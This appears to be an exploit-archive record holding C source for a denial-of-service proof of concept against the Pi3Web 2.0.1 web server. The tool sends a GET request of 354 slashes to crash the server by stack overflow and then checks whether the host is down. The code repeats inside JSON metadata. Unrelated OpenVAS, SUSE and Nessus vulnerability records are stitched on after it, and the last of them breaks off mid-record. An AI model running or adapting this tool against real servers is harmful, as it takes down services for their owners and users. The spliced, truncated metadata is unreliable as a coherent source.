ID 1337DAY-ID-5823 Type zdt Reporter aT4r Modified 2003-04-29T00:00:00
Description
Exploit for unknown platform in category dos / poc
=================================================
Pi3Web 2.0.1 Denial of Service - Proof of Concept
=================================================
/* Pi3Web 2.0.1 DoS - Pr00f of concept.
*
* Vulnerable systems: Pi3Web 2.0.1 (maybe others)
* Vendor: www.johnroy.com/pi3 - http://pi3web.sourceforge.net/
* Patch: no yet.
*
* Info: Pi3Web Server is vulnerable to a denial of Service.
* when a malformed HTTP Request is done the webserver hangs
* due to an stack overflow. GET /////////..[354]../////////
*
* Found by [email protected] 04/26/2003
* Compiled with: lcc-win32 v3.3.
*
*/
#pragma comment (lib,"ws2_32")
#include <stdio.h>
#include <windows.h>
#include <winsock2.h>
#include <string.h>
char evilbuffer[1024],evilrequest[512],ip[15];
short port=80;
int isalive(int OPT)
{
struct sockaddr_in haxorcitos;
int fd;
haxorcitos.sin_port = htons(port);
haxorcitos.sin_family = AF_INET;
haxorcitos.sin_addr.s_addr = inet_addr(ip);
if ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
{
printf(" [-] Unable to Create Socket\n\n");
return(0);
}
if (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)
{
if (OPT==0)
printf(" [+] Exploit Success. Remote webserver shutdown\n");
else
printf(" [-] Unable to connect\n\n");
return(0);
}
if (OPT==0)
{
printf(" [-] Exploit Failed. System Patched?\n\n");
}
else
{
send(fd,evilbuffer, strlen(evilbuffer),0);
printf(" [+] Data Sent. Now Checking Host\n");
closesocket(fd);
}
return(1);
}
void usage(void)
{
printf(" [+] Usage: PiDoS.exe HOST [port]\n\n"); exit(1);
}
void main(int argc,char *argv[])
{
WSADATA ws;
if (WSAStartup( MAKEWORD(1,1), &ws )!=0)
{
printf(" [+] WSAStartup() error\n");
exit(0);
}
printf("\n . .. ...:Pi3Web Denial of Service ([email protected]) :...
..\n\n");
if ((argc!=2) && (argc!=3))
usage();
strcpy(ip,argv[1]);
if (argc==3) port=atoi(argv[2]);
memset(evilrequest,0,512);
memset(evilbuffer,0,1024);
memset(evilrequest,'/',354);
//sprintf(evilbuffer, "GET %s\r\n",evilrequest);
sprintf(evilbuffer,"GET %s HTTP/1.0\r\nUser-Agent: foo\r\nHost:
%s\r\n\r\n\r\n",evilrequest,argv[2]);
if (isalive(1))
{ sleep(1000); isalive(0);}
}
# 0day.today [2018-04-13] #
{"published": "2003-04-29T00:00:00", "id": "1337DAY-ID-5823", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:57:59", "bulletin": {"published": "2003-04-29T00:00:00", "id": "1337DAY-ID-5823", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.8, "modified": "2016-04-20T01:57:59", "vector": "AV:N/AC:M/Au:M/C:N/I:P/A:N/"}}, "hash": "790b580824dd6dc0546b2813aec6cf527243a08399be8688ebad80ed228f1709", "description": "Exploit for unknown platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T01:57:59", "edition": 1, "title": "Pi3Web 2.0.1 Denial of Service - Proof of Concept ", "href": "http://0day.today/exploit/description/5823", "modified": "2003-04-29T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/5823", "references": [], "reporter": "aT4r", "sourceData": "=================================================\r\nPi3Web 2.0.1 Denial of Service - Proof of Concept \r\n=================================================\r\n\r\n\r\n\r\n\r\n/* Pi3Web 2.0.1 DoS - Pr00f of concept.\r\n*\r\n* Vulnerable systems: Pi3Web 2.0.1 (maybe others)\r\n* Vendor: www.johnroy.com/pi3 - http://pi3web.sourceforge.net/\r\n* Patch: no yet.\r\n*\r\n* Info: Pi3Web Server is vulnerable to a denial of Service.\r\n* when a malformed HTTP Request is done the webserver hangs \r\n* due to an stack overflow. GET /////////..[354]../////////\r\n*\r\n* Found by aT4r@3wdesign.es 04/26/2003\r\n* Compiled with: lcc-win32 v3.3.\r\n*\r\n*/\r\n\r\n#pragma comment (lib,\"ws2_32\")\r\n#include <stdio.h>\r\n#include <windows.h>\r\n#include <winsock2.h>\r\n#include <string.h>\r\n\r\nchar evilbuffer[1024],evilrequest[512],ip[15];\r\nshort port=80;\r\n\r\n\r\nint isalive(int OPT)\r\n{\r\n\tstruct sockaddr_in haxorcitos;\r\n\tint fd;\r\n\r\n\thaxorcitos.sin_port = htons(port);\r\n\thaxorcitos.sin_family = AF_INET;\r\n\thaxorcitos.sin_addr.s_addr = inet_addr(ip);\r\n\r\n\tif ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)\r\n\t{\r\n\t\tprintf(\" [-] Unable to Create Socket\\n\\n\");\r\n\t\treturn(0);\r\n\t}\r\n\tif (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)\r\n\t{\r\n\t\tif (OPT==0)\r\n\t\t\tprintf(\" [+] Exploit Success. Remote webserver shutdown\\n\");\r\n\t\telse\r\n\t\t\tprintf(\" [-] Unable to connect\\n\\n\");\r\n\t\treturn(0);\r\n\t}\r\n\tif (OPT==0)\r\n\t{\r\n\t\tprintf(\" [-] Exploit Failed. System Patched?\\n\\n\");\r\n\t}\r\n\telse\r\n\t{\r\n\t\tsend(fd,evilbuffer, strlen(evilbuffer),0);\r\n\t\tprintf(\" [+] Data Sent. Now Checking Host\\n\");\r\n\t\tclosesocket(fd);\r\n\r\n\t}\r\nreturn(1);\r\n}\r\n\r\n\r\nvoid usage(void)\r\n{\r\n\tprintf(\" [+] Usage: PiDoS.exe HOST [port]\\n\\n\");\texit(1);\r\n}\r\n\r\n\r\nvoid main(int argc,char *argv[])\r\n{\r\n\tWSADATA ws;\r\n\r\n\tif\t(WSAStartup( MAKEWORD(1,1), &ws )!=0)\r\n\t{\r\n\t\tprintf(\" [+] WSAStartup() error\\n\");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tprintf(\"\\n . .. ...:Pi3Web Denial of Service (aT4r@3wdesign.es) :... \r\n..\\n\\n\");\r\n\r\n\tif ((argc!=2) && (argc!=3))\r\n\t\tusage();\r\n\r\n\tstrcpy(ip,argv[1]);\r\n\tif (argc==3) port=atoi(argv[2]);\r\n\r\n\tmemset(evilrequest,0,512);\r\n\tmemset(evilbuffer,0,1024);\r\n\tmemset(evilrequest,'/',354);\r\n\t//sprintf(evilbuffer, \"GET %s\\r\\n\",evilrequest);\r\n\tsprintf(evilbuffer,\"GET %s HTTP/1.0\\r\\nUser-Agent: foo\\r\\nHost: \r\n%s\\r\\n\\r\\n\\r\\n\",evilrequest,argv[2]);\r\n\r\n\tif (isalive(1))\r\n\t\t{ sleep(1000); isalive(0);}\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d601a889f623c4d95f35966d04a7c6d8", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ba5148895056a1c2c37ee12fa6f1a4b7", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e5060bfe08769ddefb82c7b55b5a342e", "key": "reporter"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "d601a889f623c4d95f35966d04a7c6d8", "key": "published"}, {"hash": "4662324b9b2a01c46bf09c0cd8b5042a", "key": "sourceHref"}, {"hash": "e4df6d1fe7fcb64e64c1f1f8b483bced", "key": "href"}, {"hash": "2c58ecb8f185c049a2ae1f2084e71690", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category dos / poc", "hash": "48a9c6ddbd3e3500c657223989794948ff6b3ac40e33d5c542aaaa23664acae5", "enchantments": {"score": {"value": 0.8, "vector": "NONE", "modified": "2018-04-13T07:48:25"}, "dependencies": {"references": [{"type": "nessus", "idList": ["HP_INTELLIGENT_MANAGEMENT_CENTER_7_3_E0504P04.NASL", "HP_IMC_73_E0504P04.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14273", "SECURITYVULNS:VULN:5823", "SECURITYVULNS:DOC:11170", "SECURITYVULNS:VULN:3475", "SECURITYVULNS:DOC:5823"]}], "modified": "2018-04-13T07:48:25"}, "vulnersScore": 0.8}, "type": "zdt", "lastseen": "2018-04-13T07:48:25", "edition": 2, "title": "Pi3Web 2.0.1 Denial of Service - Proof of Concept ", "href": "https://0day.today/exploit/description/5823", "modified": "2003-04-29T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/5823", "references": [], "reporter": "aT4r", "sourceData": "=================================================\r\nPi3Web 2.0.1 Denial of Service - Proof of Concept \r\n=================================================\r\n\r\n\r\n\r\n\r\n/* Pi3Web 2.0.1 DoS - Pr00f of concept.\r\n*\r\n* Vulnerable systems: Pi3Web 2.0.1 (maybe others)\r\n* Vendor: www.johnroy.com/pi3 - http://pi3web.sourceforge.net/\r\n* Patch: no yet.\r\n*\r\n* Info: Pi3Web Server is vulnerable to a denial of Service.\r\n* when a malformed HTTP Request is done the webserver hangs \r\n* due to an stack overflow. GET /////////..[354]../////////\r\n*\r\n* Found by [email\u00a0protected] 04/26/2003\r\n* Compiled with: lcc-win32 v3.3.\r\n*\r\n*/\r\n\r\n#pragma comment (lib,\"ws2_32\")\r\n#include <stdio.h>\r\n#include <windows.h>\r\n#include <winsock2.h>\r\n#include <string.h>\r\n\r\nchar evilbuffer[1024],evilrequest[512],ip[15];\r\nshort port=80;\r\n\r\n\r\nint isalive(int OPT)\r\n{\r\n\tstruct sockaddr_in haxorcitos;\r\n\tint fd;\r\n\r\n\thaxorcitos.sin_port = htons(port);\r\n\thaxorcitos.sin_family = AF_INET;\r\n\thaxorcitos.sin_addr.s_addr = inet_addr(ip);\r\n\r\n\tif ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)\r\n\t{\r\n\t\tprintf(\" [-] Unable to Create Socket\\n\\n\");\r\n\t\treturn(0);\r\n\t}\r\n\tif (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)\r\n\t{\r\n\t\tif (OPT==0)\r\n\t\t\tprintf(\" [+] Exploit Success. Remote webserver shutdown\\n\");\r\n\t\telse\r\n\t\t\tprintf(\" [-] Unable to connect\\n\\n\");\r\n\t\treturn(0);\r\n\t}\r\n\tif (OPT==0)\r\n\t{\r\n\t\tprintf(\" [-] Exploit Failed. System Patched?\\n\\n\");\r\n\t}\r\n\telse\r\n\t{\r\n\t\tsend(fd,evilbuffer, strlen(evilbuffer),0);\r\n\t\tprintf(\" [+] Data Sent. Now Checking Host\\n\");\r\n\t\tclosesocket(fd);\r\n\r\n\t}\r\nreturn(1);\r\n}\r\n\r\n\r\nvoid usage(void)\r\n{\r\n\tprintf(\" [+] Usage: PiDoS.exe HOST [port]\\n\\n\");\texit(1);\r\n}\r\n\r\n\r\nvoid main(int argc,char *argv[])\r\n{\r\n\tWSADATA ws;\r\n\r\n\tif\t(WSAStartup( MAKEWORD(1,1), &ws )!=0)\r\n\t{\r\n\t\tprintf(\" [+] WSAStartup() error\\n\");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tprintf(\"\\n . .. ...:Pi3Web Denial of Service ([email\u00a0protected]) :... \r\n..\\n\\n\");\r\n\r\n\tif ((argc!=2) && (argc!=3))\r\n\t\tusage();\r\n\r\n\tstrcpy(ip,argv[1]);\r\n\tif (argc==3) port=atoi(argv[2]);\r\n\r\n\tmemset(evilrequest,0,512);\r\n\tmemset(evilbuffer,0,1024);\r\n\tmemset(evilrequest,'/',354);\r\n\t//sprintf(evilbuffer, \"GET %s\\r\\n\",evilrequest);\r\n\tsprintf(evilbuffer,\"GET %s HTTP/1.0\\r\\nUser-Agent: foo\\r\\nHost: \r\n%s\\r\\n\\r\\n\\r\\n\",evilrequest,argv[2]);\r\n\r\n\tif (isalive(1))\r\n\t\t{ sleep(1000); isalive(0);}\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "3dd1859d06a54a2e7501e91bd5ef282e", "key": "href"}, {"hash": "d601a889f623c4d95f35966d04a7c6d8", "key": "modified"}, {"hash": "d601a889f623c4d95f35966d04a7c6d8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e5060bfe08769ddefb82c7b55b5a342e", "key": "reporter"}, {"hash": "157ce26ca7b64edf14606484de9f737d", "key": "sourceData"}, {"hash": "fdc692534e1b2be028bc3634daa0566a", "key": "sourceHref"}, {"hash": "2c58ecb8f185c049a2ae1f2084e71690", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"openvas": [{"lastseen": "2019-07-05T18:43:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-07-04T00:00:00", "published": "2019-06-29T00:00:00", "id": "OPENVAS:1361412562310852598", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852598", "title": "openSUSE Update for chromium openSUSE-SU-2019:1666-1 (chromium)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852598\");\n script_version(\"2019-07-04T09:58:18+0000\");\n script_cve_id(\"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\",\n \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\",\n \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\",\n \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\",\n \"CVE-2019-5803\", \"CVE-2019-5804\", \"CVE-2019-5805\", \"CVE-2019-5806\",\n \"CVE-2019-5807\", \"CVE-2019-5808\", \"CVE-2019-5809\", \"CVE-2019-5810\",\n \"CVE-2019-5811\", \"CVE-2019-5812\", \"CVE-2019-5813\", \"CVE-2019-5814\",\n \"CVE-2019-5815\", \"CVE-2019-5816\", \"CVE-2019-5817\", \"CVE-2019-5818\",\n \"CVE-2019-5819\", \"CVE-2019-5820\", \"CVE-2019-5821\", \"CVE-2019-5822\",\n \"CVE-2019-5823\", \"CVE-2019-5824\", \"CVE-2019-5827\", \"CVE-2019-5828\",\n \"CVE-2019-5829\", \"CVE-2019-5830\", \"CVE-2019-5831\", \"CVE-2019-5832\",\n \"CVE-2019-5833\", \"CVE-2019-5834\", \"CVE-2019-5835\", \"CVE-2019-5836\",\n \"CVE-2019-5837\", \"CVE-2019-5838\", \"CVE-2019-5839\", \"CVE-2019-5840\",\n \"CVE-2019-5842\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:58:18 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-29 02:01:15 +0000 (Sat, 29 Jun 2019)\");\n script_name(\"openSUSE Update for chromium openSUSE-SU-2019:1666-1 (chromium)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.3|openSUSELeap15\\.0)\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1666_1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00085.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2019:1666_1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for chromium fixes the following issues:\n\n Chromium was updated to 75.0.3770.90 (boo#1137332 boo#1138287):\n\n * CVE-2019-5842: Use-after-free in Blink.\n\n\n Also updated to 75.0.3770.80 boo#1137332:\n\n * CVE-2019-5828: Use after free in ServiceWorker\n\n * CVE-2019-5829: Use after free in Download Manager\n\n * CVE-2019-5830: Incorrectly credentialed requests in CORS\n\n * CVE-2019-5831: Incorrect map processing in V8\n\n * CVE-2019-5832: Incorrect CORS handling in XHR\n\n * CVE-2019-5833: Inconsistent security UI placemen\n\n * CVE-2019-5835: Out of bounds read in Swiftshader\n\n * CVE-2019-5836: Heap buffer overflow in Angle\n\n * CVE-2019-5837: Cross-origin resources size disclosure in Appcache\n\n * CVE-2019-5838: Overly permissive tab access in Extensions\n\n * CVE-2019-5839: Incorrect handling of certain code points in Blink\n\n * CVE-2019-5840: Popup blocker bypass\n\n * Various fixes from internal audits, fuzzing and other initiatives\n\n * CVE-2019-5834: URL spoof in Omnibox on iOS\n\n Update to 74.0.3729.169:\n\n * Feature fixes update only\n\n Update to 74.0.3729.157:\n\n * Various security fixes from internal audits, fuzzing and other\n initiatives\n\n Includes security fixes from 74.0.3729.131 (boo#1134218):\n\n * CVE-2019-5827: Out-of-bounds access in SQLite\n\n * CVE-2019-5824: Parameter passing error in media player\n\n Update to 74.0.3729.108 boo#1133313:\n\n * CVE-2019-5805: Use after free in PDFium\n\n * CVE-2019-5806: Integer overflow in Angle\n\n * CVE-2019-5807: Memory corruption in V8\n\n * CVE-2019-5808: Use after free in Blink\n\n * CVE-2019-5809: Use after free in Blink\n\n * CVE-2019-5810: User information disclosure in Autofill\n\n * CVE-2019-5811: CORS bypass in Blink\n\n * CVE-2019-5813: Out of bounds read in V8\n\n * CVE-2019-5814: CORS bypass in Blink\n\n * CVE-2019-5815: Heap buffer overflow in Blink\n\n * CVE-2019-5818: Uninitialized value in media reader\n\n * CVE-2019-5819: Incorrect escaping in developer tools\n\n * CVE-2019-5820: Integer overflow in PDFium\n\n * CVE-2019-5821: Integer overflow in PDFium\n\n * CVE-2019-5822: CORS bypass in download manager\n\n * CVE-2019-5823: Forced navigation from service worker\n\n * CVE-2019-5812: URL spoof in Omnibox on iOS\n\n * CVE-2019-5816: Exploit persistence extension on Android\n\n * CVE-2019-5817: Heap buffer overflow in Angle on Windows\n\n Update to 73.0.3686.103:\n\n * Various feature fixes\n\n Update to 73.0.3683.86:\n\n * Just feature fixes around\n\n - Update conditions to use system harfbuzz on TW+\n\n - Require java during build\n\n - Enable using pipewire when available\n\n - Rebase chromium-vaapi.patch to match up the Fedora one\n\n Update to 73 ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 42.3, openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~75.0.3770.90~217.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~75.0.3770.90~217.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~75.0.3770.90~217.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~75.0.3770.90~217.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~75.0.3770.90~217.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~75.0.3770.90~lp150.218.4\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~75.0.3770.90~lp150.218.4\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~75.0.3770.90~lp150.218.4\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~75.0.3770.90~lp150.218.4\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~75.0.3770.90~lp150.218.4\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2019-07-02T10:41:51", "bulletinFamily": "unix", "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 75.0.3770.90 (boo#1137332 boo#1138287):\n\n * CVE-2019-5842: Use-after-free in Blink.\n\n\n Also updated to 75.0.3770.80 boo#1137332:\n\n * CVE-2019-5828: Use after free in ServiceWorker\n * CVE-2019-5829: Use after free in Download Manager\n * CVE-2019-5830: Incorrectly credentialed requests in CORS\n * CVE-2019-5831: Incorrect map processing in V8\n * CVE-2019-5832: Incorrect CORS handling in XHR\n * CVE-2019-5833: Inconsistent security UI placemen\n * CVE-2019-5835: Out of bounds read in Swiftshader\n * CVE-2019-5836: Heap buffer overflow in Angle\n * CVE-2019-5837: Cross-origin resources size disclosure in Appcache\n * CVE-2019-5838: Overly permissive tab access in Extensions\n * CVE-2019-5839: Incorrect handling of certain code points in Blink\n * CVE-2019-5840: Popup blocker bypass\n * Various fixes from internal audits, fuzzing and other initiatives\n * CVE-2019-5834: URL spoof in Omnibox on iOS\n\n Update to 74.0.3729.169:\n\n * Feature fixes update only\n\n Update to 74.0.3729.157:\n\n * Various security fixes from internal audits, fuzzing and other\n initiatives\n\n Includes security fixes from 74.0.3729.131 (boo#1134218):\n\n * CVE-2019-5827: Out-of-bounds access in SQLite\n * CVE-2019-5824: Parameter passing error in media player\n\n Update to 74.0.3729.108 boo#1133313:\n\n * CVE-2019-5805: Use after free in PDFium\n * CVE-2019-5806: Integer overflow in Angle\n * CVE-2019-5807: Memory corruption in V8\n * CVE-2019-5808: Use after free in Blink\n * CVE-2019-5809: Use after free in Blink\n * CVE-2019-5810: User information disclosure in Autofill\n * CVE-2019-5811: CORS bypass in Blink\n * CVE-2019-5813: Out of bounds read in V8\n * CVE-2019-5814: CORS bypass in Blink\n * CVE-2019-5815: Heap buffer overflow in Blink\n * CVE-2019-5818: Uninitialized value in media reader\n * CVE-2019-5819: Incorrect escaping in developer tools\n * CVE-2019-5820: Integer overflow in PDFium\n * CVE-2019-5821: Integer overflow in PDFium\n * CVE-2019-5822: CORS bypass in download manager\n * CVE-2019-5823: Forced navigation from service worker\n * CVE-2019-5812: URL spoof in Omnibox on iOS\n * CVE-2019-5816: Exploit persistence extension on Android\n * CVE-2019-5817: Heap buffer overflow in Angle on Windows\n\n Update to 73.0.3686.103:\n * Various feature fixes\n\n Update to 73.0.3683.86:\n\n * Just feature fixes around\n\n - Update conditions to use system harfbuzz on TW+\n - Require java during build\n - Enable using pipewire when available\n - Rebase chromium-vaapi.patch to match up the Fedora one\n\n Update to 73.0.3683.75 boo#1129059:\n\n * CVE-2019-5787: Use after free in Canvas.\n * CVE-2019-5788: Use after free in FileAPI.\n * CVE-2019-5789: Use after free in WebMIDI.\n * CVE-2019-5790: Heap buffer overflow in V8.\n * CVE-2019-5791: Type confusion in V8.\n * CVE-2019-5792: Integer overflow in PDFium.\n * CVE-2019-5793: Excessive permissions for private API in Extensions.\n * CVE-2019-5794: Security UI spoofing.\n * CVE-2019-5795: Integer overflow in PDFium.\n * CVE-2019-5796: Race condition in Extensions.\n * CVE-2019-5797: Race condition in DOMStorage.\n * CVE-2019-5798: Out of bounds read in Skia.\n * CVE-2019-5799: CSP bypass with blob URL.\n * CVE-2019-5800: CSP bypass with blob URL.\n * CVE-2019-5801: Incorrect Omnibox display on iOS.\n * CVE-2019-5802: Security UI spoofing.\n * CVE-2019-5803: CSP bypass with Javascript URLs'.\n * CVE-2019-5804: Command line command injection on Windows.\n\n", "modified": "2019-06-28T18:12:28", "published": "2019-06-28T18:12:28", "id": "OPENSUSE-SU-2019:1666-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00086.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-02-21T01:31:25", "bulletinFamily": "scanner", "description": "The version of HPE Intelligent Management Center (iMC) PLAT installed on the Windows host is prior to 7.3 E0504P04. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified flaw exists that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5815)\n\n - A command injection vulnerability exists in the dbman service due to improper validation of user-supplied input before it is passed to a system call. An unauthenticated, remote attacker can exploit this, via a specially crafted opcode 10008 request, to inject and execute arbitrary OS commands with SYSTEM privileges.\n (CVE-2017-5816)\n\n - Multiple command injection vulnerabilities exist in the dbman service due to improper validation of user-supplied input before it is passed to a system call. An unauthenticated, remote attacker can exploit these, via a specially crafted opcode 10007 request, to inject and execute arbitrary OS commands with SYSTEM privileges. (CVE-2017-5817, CVE-2017-5819)\n\n - A flaw exists in the dbman service when handling opcode 10007 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to delete arbitrary files with SYSTEM privileges.\n (CVE-2017-5818)\n\n - A flaw exists in the dbman service when handling opcode 10004 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-5820)\n\n - A flaw exists in the dbman service when handling opcode 10006 and 10010 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially request, to execute arbitrary code. (CVE-2017-5821)\n\n - A flaw exists in the dbman service when handling opcode 10010 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-5822)\n\n - A flaw exists in the dbman service when handling opcode 10013 requests due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-5823)\n\n - A NULL pointer deference flaw exists, specifically in the asn1_item_embed_d2i() function within file crypto/asn1/tasn_dec.c, when handling the ASN.1 CHOICE type, which results in a NULL value being passed to the structure callback if an attempt is made to free certain invalid encodings. An unauthenticated, remote attacker can exploit this to cause a denial of service condition.\n (CVE-2016-7053)\n\n - A heap overflow condition exists in the chacha20_poly1305_cipher() function within file crypto/evp/e_chacha20_poly1305.c when handling TLS connections using *-CHACHA20-POLY1305 cipher suites. An unauthenticated, remote attacker can exploit this to cause a denial of service condition. (CVE-2016-7054)\n\n - A carry propagation error exists in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055)\n\n - An unspecified remote code execution vulnerability exists that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-8948)\n\n - A stack-based buffer overflow condition exists due to improper validation of input when copying data. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-8956)\n\nNote that Intelligent Management Center (iMC) is an HPE product;\nhowever, it is branded as H3C.", "modified": "2018-11-15T00:00:00", "id": 